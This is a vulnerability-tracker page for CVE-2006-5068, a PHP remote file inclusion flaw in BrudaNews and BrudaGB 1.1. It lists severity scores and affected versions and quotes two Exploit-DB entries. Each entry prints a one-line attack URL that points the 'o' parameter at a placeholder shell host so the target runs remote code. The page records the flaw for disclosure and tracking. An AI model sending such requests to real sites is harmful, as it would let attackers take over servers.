CVE-2006-5068
published 2006-09-28CVE-2006-5068: PHP remote file inclusion vulnerability in admin/index.php in Brudaswen (1) BrudaNews 1.1 and earlier and (2) BrudaGB 1.1 and earlier allows remote attackers…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.83%
88.8th percentile
PHP remote file inclusion vulnerability in admin/index.php in Brudaswen (1) BrudaNews 1.1 and earlier and (2) BrudaGB 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the o parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| brudaswen | brudanews | <= 1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion
exploitdb·2006-09-25
CVE-2006-5068 BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion
BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion
---
#==============================================================================================
#BrudaGB
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
# milw0rm.com [2006-09-25]
Exploit-DB
BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion
exploitdb·2006-09-25
CVE-2006-5068 BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion
BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion
---
#==============================================================================================
#BrudaNews
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
# milw0rm.com [2006-09-25]
No writeups or analysis indexed.
http://secunia.com/advisories/22115http://www.osvdb.org/29176http://www.securityfocus.com/bid/20192http://www.vupen.com/english/advisories/2006/3773https://exchange.xforce.ibmcloud.com/vulnerabilities/29141https://exchange.xforce.ibmcloud.com/vulnerabilities/29142https://www.exploit-db.com/exploits/2432https://www.exploit-db.com/exploits/2433http://secunia.com/advisories/22115http://www.osvdb.org/29176http://www.securityfocus.com/bid/20192http://www.vupen.com/english/advisories/2006/3773https://exchange.xforce.ibmcloud.com/vulnerabilities/29141https://exchange.xforce.ibmcloud.com/vulnerabilities/29142https://www.exploit-db.com/exploits/2432https://www.exploit-db.com/exploits/2433
2006-09-28
Published